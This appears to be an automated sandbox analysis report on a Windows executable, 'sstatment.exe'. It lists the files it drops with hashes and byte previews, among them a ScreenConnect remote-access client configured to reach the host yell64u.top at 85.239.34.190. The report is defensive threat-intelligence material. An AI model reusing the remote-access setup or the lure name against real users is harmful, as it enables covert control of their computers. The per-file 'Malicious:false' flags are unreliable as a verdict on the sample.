                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {4904E32F-1F5B-2CE5-B18E-779BCD958764}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                  Category:dropped
                                                                                  Size (bytes):13422592
                                                                                  Entropy (8bit):7.966821246832764
                                                                                  Encrypted:false
                                                                                  SSDEEP:196608:h53JLR3LGMLiW35T53JLR3LGMLt53JLR3LGMLH53JLR3LGML153JLR3LGMLE53Jx:bTiuJTXTtTPTkTTT
                                                                                  MD5:6A2ADC94DAA65C3DF41AECB62A15ABBF
                                                                                  SHA1:D9EFD7E530D7BEAA48C4975547164DD9064ED976
                                                                                  SHA-256:2310F1CADF0F56C9A1550A87D6414EB4C1495CAD375D8695E6EE6699074F37A9
                                                                                  SHA-512:25538C46A71A2692F2BBEB4AE764E83A013E3573E87D93DFC4699FBFC4459D8B57613360FEEBC24BC31478DE2FF6D6CE66511CBC831528970B8E29D87AD80900
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {4904E32F-1F5B-2CE5-B18E-779BCD958764}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug 13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
                                                                                  Category:dropped
                                                                                  Size (bytes):13422592
                                                                                  Entropy (8bit):7.966821246832764
                                                                                  Encrypted:false
                                                                                  SSDEEP:196608:h53JLR3LGMLiW35T53JLR3LGMLt53JLR3LGMLH53JLR3LGML153JLR3LGMLE53Jx:bTiuJTXTtTPTkTTT
                                                                                  MD5:6A2ADC94DAA65C3DF41AECB62A15ABBF
                                                                                  SHA1:D9EFD7E530D7BEAA48C4975547164DD9064ED976
                                                                                  SHA-256:2310F1CADF0F56C9A1550A87D6414EB4C1495CAD375D8695E6EE6699074F37A9
                                                                                  SHA-512:25538C46A71A2692F2BBEB4AE764E83A013E3573E87D93DFC4699FBFC4459D8B57613360FEEBC24BC31478DE2FF6D6CE66511CBC831528970B8E29D87AD80900
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):431083
                                                                                  Entropy (8bit):6.617529896602035
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:DuH2aCGw1ST1wQLdqv5uH2aCGw1ST1wQLdqvxsse:DuH2anwohwQUv5uH2anwohwQUvxsse
                                                                                  MD5:EBDD0CE15FFAD50062C5934A2B47FF66
                                                                                  SHA1:6B223BA8D191CE1BDD1137CF39CCEAFC67A97043
                                                                                  SHA-256:D88B36E235B446BFF6A4FA3F90D87AD966193623887C9D70C08D0FC297D30157
                                                                                  SHA-512:8FD7D99855123B4605AB5FC557A023D4B12A1306922E3583308C2FE80D5ED66EB3BC3B55DFE799D1AA7FD793451AD42F40454F87F6946A00FC35D0CF5DF49DB2
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Installer\MSI3407.tmp, Author: Joe Security
                                                                                  Preview:...@IXOS.@.....@.jOY.@.....@.....@.....@.....@.....@......&.{4904E32F-1F5B-2CE5-B18E-779BCD958764}'.ScreenConnect Client (de5851ad6e374ce3)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{4904E32F-1F5B-2CE5-B18E-779BCD958764}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (de5851ad6e374ce3)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{AF52190F-9138-8DD5-E284-9AF07DDE1216}^.C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll.@.......@.....@.....@......&.{5462DCDA-B5AB-15F8-7838-2A54948A34EB}f.C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsBackstageShell.exe.@.......@.....@.....@......&.{41277B46-8511-4FBD-DF82-7BFA9BAEED18}c.C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsFileManager.exe.@.......@.
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):207360
                                                                                  Entropy (8bit):6.573348437503042
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:X9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG:XuH2aCGw1ST1wQLdqv
                                                                                  MD5:BA84DD4E0C1408828CCC1DE09F585EDA
                                                                                  SHA1:E8E10065D479F8F591B9885EA8487BC673301298
                                                                                  SHA-256:3CFF4AC91288A0FF0C13278E73B282A64E83D089C5A61A45D483194AB336B852
                                                                                  SHA-512:7A38418F6EE8DBC66FAB2CD5AD8E033E761912EFC465DAA484858D451DA4B8576079FE90FD3B6640410EDC8B3CAC31C57719898134F246F4000D60A252D88290
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........AF../.../.../.'D..../.'D..../.'D..../...,.../...+.../...*.../......./......./.....n./.*.*.../.*./.../.*...../....../.*.-.../.Rich../.........................PE..L...pG.Y...........!.........L......&.....................................................@.................................P........P..x....................`......P...T...............................@...............<............................text...+........................... ..`.rdata..*...........................@..@.data...."... ......................@....rsrc...x....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):1.1619848432390618
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:JSbX72FjsSAGiLIlHVRpMh/7777777777777777777777777vDHFFsQQMWlp3XlN:JaSQI5cJWb6F
                                                                                  MD5:685A542F4213CB62C2CB686A4968349E
                                                                                  SHA1:D79352335D2E4AC235DFC79E0AA33B534B54CA9E
                                                                                  SHA-256:AC26C157803B5E3DE57EA9A6559613F6E218BD08810996137253A522DD192C74
                                                                                  SHA-512:EE967768BACCE25299E37F64B10CE6C1747C58038BE9A251440CDF54A957AA001EFC359B28966E080EE619C7DB162C9BED578D2186ACC8F2703868674E448B28
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):1.7958330715534179
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:y8PhDuRc06WX4uFT5h9ptwNqcq56AduNSiAoiR14kdZq+ommXrz4kToArGAduNSU:dhD1eFTJwQpYf9i8kdwLmm34bt
                                                                                  MD5:B03900734CC7AD05537941CF8479E916
                                                                                  SHA1:3E8E219567B8D01F45C7BC49DD2282CCAC4239F4
                                                                                  SHA-256:906C78A62BEA376DB3E56B513AB002E65E5F73A2054E3C94B9A8A7B2D9BC94C4
                                                                                  SHA-512:491B4019E71A93CF7184643D0BC8666AD457F8FC5D7D9718A1C904471CF3F83C61D4DB66D1DB477F5E4C714E382AF0132ABD9ABBAEFA48456CA8256F87CD8276
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:MS Windows icon resource - 3 icons, 16x16 with PNG image data, 45 x 45, 8-bit/color RGBA, non-interlaced, 4 bits/pixel, 32x32 with PNG image data, 45 x 45, 8-bit/color RGBA, non-interlaced, 4 bits/pixel
                                                                                  Category:dropped
                                                                                  Size (bytes):7668
                                                                                  Entropy (8bit):7.864444854228408
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:NN78fxDBmgwVRjuzFN78fxDBmgwVRjuzFN78fxDBmgwVRjuzc:NN78dB742N78dB742N78dB74d
                                                                                  MD5:55A6B0132343F5FC425515F0E29A5A53
                                                                                  SHA1:CC8FE5C184EBB14AD6D835D8E743F4FC2678CB10
                                                                                  SHA-256:A6663FB9874ABA9B9C1958D2D17470B73E1C95621A503454B2D0F941F989EAA6
                                                                                  SHA-512:4F57298141165351CCE82CCCD9CAE456591253C9BEB753645D92B73D933F8405CD22011FC0E8C488A2CD3D3B54C7AF327F2869432EE92C1C41B0F4474D6C6BE9
                                                                                  Malicious:false
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):432221
                                                                                  Entropy (8bit):5.375169839047906
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgauw:zTtbmkExhMJCIpErh
                                                                                  MD5:F2FA3DF8097C2A464710A3296832A6D8
                                                                                  SHA1:C512FD5AEDD3229F8E178091D3F8809EC3172717
                                                                                  SHA-256:B05A32D076304E9F76630D23F75BF02C86CCB2355A09386593DEAC7A5FDB200F
                                                                                  SHA-512:A0C377913C1A378C6F86FFD09E9F9F9D8CCB921A8C5DA4F2EEB62DD84FFFB25346CD135BB61F38C84757FDFC0ACD236A5100F7C65575DB753BE8A6BCDB1600AE
                                                                                  Malicious:false
                                                                                  Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                                  Process:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:modified
                                                                                  Size (bytes):556
                                                                                  Entropy (8bit):5.043059862701304
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOIUiQCD9Ce/vXbAa3xT:2dL9hK6E46YP679HvH
                                                                                  MD5:C5CFAE12350984CB65DFED7D7A3B81BF
                                                                                  SHA1:36376B580009CBBE75D7860E41B529913E48B0CE
                                                                                  SHA-256:4D6090BC2A5D0B943D7052A3C57F4D12BFC7A78F8B6CC42D47603BF560737CCE
                                                                                  SHA-512:C7E7B129A9339E5D149FA8D114CD3A36CEFC92CB22DE08D40DF8F07228BEB0910155F72D0DFCE36ABE387743F69F8AF75B7F7A36B466834F25FE4B720CB17F77
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>yell64u.top=85.239.34.190-15%2f10%2f2024%2017%3a20%3a06</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                  Process:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):556
                                                                                  Entropy (8bit):5.043059862701304
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOIUiQCD9Ce/vXbAa3xT:2dL9hK6E46YP679HvH
                                                                                  MD5:C5CFAE12350984CB65DFED7D7A3B81BF
                                                                                  SHA1:36376B580009CBBE75D7860E41B529913E48B0CE
                                                                                  SHA-256:4D6090BC2A5D0B943D7052A3C57F4D12BFC7A78F8B6CC42D47603BF560737CCE
                                                                                  SHA-512:C7E7B129A9339E5D149FA8D114CD3A36CEFC92CB22DE08D40DF8F07228BEB0910155F72D0DFCE36ABE387743F69F8AF75B7F7A36B466834F25FE4B720CB17F77
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>yell64u.top=85.239.34.190-15%2f10%2f2024%2017%3a20%3a06</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                  Process:C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1590
                                                                                  Entropy (8bit):5.363907225770245
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:MxHKQ71qHGIs0HKEHiYHKGSI6oPtHTHhAHKKkhHNpv:iq+wmj0qECYqGSI6oPtzHeqKkhtpv
                                                                                  MD5:E88F0E3AD82AC5F6557398EBC137B0DE
                                                                                  SHA1:20D4BBBE8E219D2D2A0E01DA1F7AD769C3AC84DA
                                                                                  SHA-256:278AA1D32C89FC4CD991CA18B6E70D3904C57E50192FA6D882959EB16F14E380
                                                                                  SHA-512:CA6A7AAE873BB300AC17ADE2394232E8C782621E30CA23EBCE8FE65EF2E5905005EFD2840FD9310FBB20D9E9848961FAE2873B3879FCBC58F8A6074337D5802D
                                                                                  Malicious:false
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):512
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                  Malicious:false
                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):512
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                  Malicious:false
                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):32768
                                                                                  Entropy (8bit):1.4178763017262117
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:4x4buvO+xFX4vT5hUe9ptwNqcq56AduNSiAoiR14kdZq+ommXrz4kToArGAduNSU:lbcsTXHwQpYf9i8kdwLmm34bt
                                                                                  MD5:4F6A134AAD802C7F352475FA5AF54807
                                                                                  SHA1:320BCEF2C9D8ADDBDD620F9DAB4DA5B769D0F59A
                                                                                  SHA-256:239B91667E3D3163CF9C89C955CFB908E031558AFAAE7A41E63890F2354A55E1
                                                                                  SHA-512:4628CA8191653EBFCE092D18CC80E9E6B5B6A316A2189C5FA8A1EF58DE57842CA9FEBB01064CC71402D148AA923F24A6232C17CFC82A0C72608759F96C9AA6F3
                                                                                  Malicious:false
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):32768
                                                                                  Entropy (8bit):1.4178763017262117
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:4x4buvO+xFX4vT5hUe9ptwNqcq56AduNSiAoiR14kdZq+ommXrz4kToArGAduNSU:lbcsTXHwQpYf9i8kdwLmm34bt
                                                                                  MD5:4F6A134AAD802C7F352475FA5AF54807
                                                                                  SHA1:320BCEF2C9D8ADDBDD620F9DAB4DA5B769D0F59A
                                                                                  SHA-256:239B91667E3D3163CF9C89C955CFB908E031558AFAAE7A41E63890F2354A55E1
                                                                                  SHA-512:4628CA8191653EBFCE092D18CC80E9E6B5B6A316A2189C5FA8A1EF58DE57842CA9FEBB01064CC71402D148AA923F24A6232C17CFC82A0C72608759F96C9AA6F3
                                                                                  Malicious:false
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):32768
                                                                                  Entropy (8bit):0.06895163310047703
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOFfWbQQMH2GyVky6l3X:2F0i8n0itFzDHFFsQQMWE3X
                                                                                  MD5:C85807D9C86F61CC55E9E5E204EE1B2B
                                                                                  SHA1:D11808CD08870E93F0D382F217411E2F99422CF9
                                                                                  SHA-256:9E033D6440DF6DF635B3C7D0CC18ECAE3B072D15711B6B580DE8354F1D197FBD
                                                                                  SHA-512:7515D40AA54B9E7ADF3D701F986CFB7A28FD223CCE00A2D587FAA9E2BDF1362EF4F3F0273246E90BAB103127F180C3192D6AE567FA4363D195E46E9C1834D929
                                                                                  Malicious:false
                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):512
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                  Malicious:false
                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):1.7958330715534179
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:y8PhDuRc06WX4uFT5h9ptwNqcq56AduNSiAoiR14kdZq+ommXrz4kToArGAduNSU:dhD1eFTJwQpYf9i8kdwLmm34bt
                                                                                  MD5:B03900734CC7AD05537941CF8479E916
                                                                                  SHA1:3E8E219567B8D01F45C7BC49DD2282CCAC4239F4
                                                                                  SHA-256:906C78A62BEA376DB3E56B513AB002E65E5F73A2054E3C94B9A8A7B2D9BC94C4
                                                                                  SHA-512:491B4019E71A93CF7184643D0BC8666AD457F8FC5D7D9718A1C904471CF3F83C61D4DB66D1DB477F5E4C714E382AF0132ABD9ABBAEFA48456CA8256F87CD8276
                                                                                  Malicious:false
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):512
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                  Malicious:false
                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):1.7958330715534179
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:y8PhDuRc06WX4uFT5h9ptwNqcq56AduNSiAoiR14kdZq+ommXrz4kToArGAduNSU:dhD1eFTJwQpYf9i8kdwLmm34bt
                                                                                  MD5:B03900734CC7AD05537941CF8479E916
                                                                                  SHA1:3E8E219567B8D01F45C7BC49DD2282CCAC4239F4
                                                                                  SHA-256:906C78A62BEA376DB3E56B513AB002E65E5F73A2054E3C94B9A8A7B2D9BC94C4
                                                                                  SHA-512:491B4019E71A93CF7184643D0BC8666AD457F8FC5D7D9718A1C904471CF3F83C61D4DB66D1DB477F5E4C714E382AF0132ABD9ABBAEFA48456CA8256F87CD8276
                                                                                  Malicious:false
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):32768
                                                                                  Entropy (8bit):1.4178763017262117
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:4x4buvO+xFX4vT5hUe9ptwNqcq56AduNSiAoiR14kdZq+ommXrz4kToArGAduNSU:lbcsTXHwQpYf9i8kdwLmm34bt
                                                                                  MD5:4F6A134AAD802C7F352475FA5AF54807
                                                                                  SHA1:320BCEF2C9D8ADDBDD620F9DAB4DA5B769D0F59A
                                                                                  SHA-256:239B91667E3D3163CF9C89C955CFB908E031558AFAAE7A41E63890F2354A55E1
                                                                                  SHA-512:4628CA8191653EBFCE092D18CC80E9E6B5B6A316A2189C5FA8A1EF58DE57842CA9FEBB01064CC71402D148AA923F24A6232C17CFC82A0C72608759F96C9AA6F3
                                                                                  Malicious:false
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):512
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                  Malicious:false
                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):69632
                                                                                  Entropy (8bit):0.23281783852525628
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:oukDBAduNS3qcq56AduNSiAoiR14kdZq+ommXrz4kToArSwp9p:1GxpYf9i8kdwLmm34hw
                                                                                  MD5:94BEE54743A89DD81D66F1B8DCE57355
                                                                                  SHA1:6DDFED64BFDCF420F87DF224885DDE6EE4697C54
                                                                                  SHA-256:D8AB2D66BDB9A29968FBF0C8091D62FB721E35899E74252D998343CA4B7F0F44
                                                                                  SHA-512:71C5DE2804A0734723F63915BA9055FBA2405D8668EDD68C0B97BC1CCCA3D5334AB2B103C6F501F4EA762FC907FDF9945F38DFE3CF6D88379993B34BF0446A5B
                                                                                  Malicious:false
                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):7.429483929801877
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:sstatment.exe
                                                                                  File size:5'652'448 bytes
                                                                                  MD5:9aba870d429cb8fa53103ae4b7182af6
                                                                                  SHA1:5f5cea1da1f5238f76a547a1c1fab8b039a190b0
                                                                                  SHA256:9fa76b4ab82376d9486f051b2a7f0e2f584243296f94b2b4b30ea24fae05edd3
                                                                                  SHA512:78540cb97e1cf0bdc49a449ec55182ff4c9555a38bab15c4e28aef1ab237c78d2333bff95681884691b99feb2b0ec551b3f4d36a8353923aa14e522a93d8bf5b
                                                                                  SSDEEP:49152:IDex5xKkEJkGYYpT0+TFiH7efP0x58IJL+md3rHgDNMKLo8SsxG/XcW32gqkAfoo:c4s6efPQ53JLbd3LINMLaGUW39f0
                                                                                  TLSH:FE46E111B3D995B9C0BF063CD87A52699A74BC048722C7AF57D4BD292D32BC05E323B6
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`.....O>`.....?>`.....]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF..A>`.[l..F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`........
                                                                                  Icon Hash:90cececece8e8eb0
                                                                                  Entrypoint:0x4014ad
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:true
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
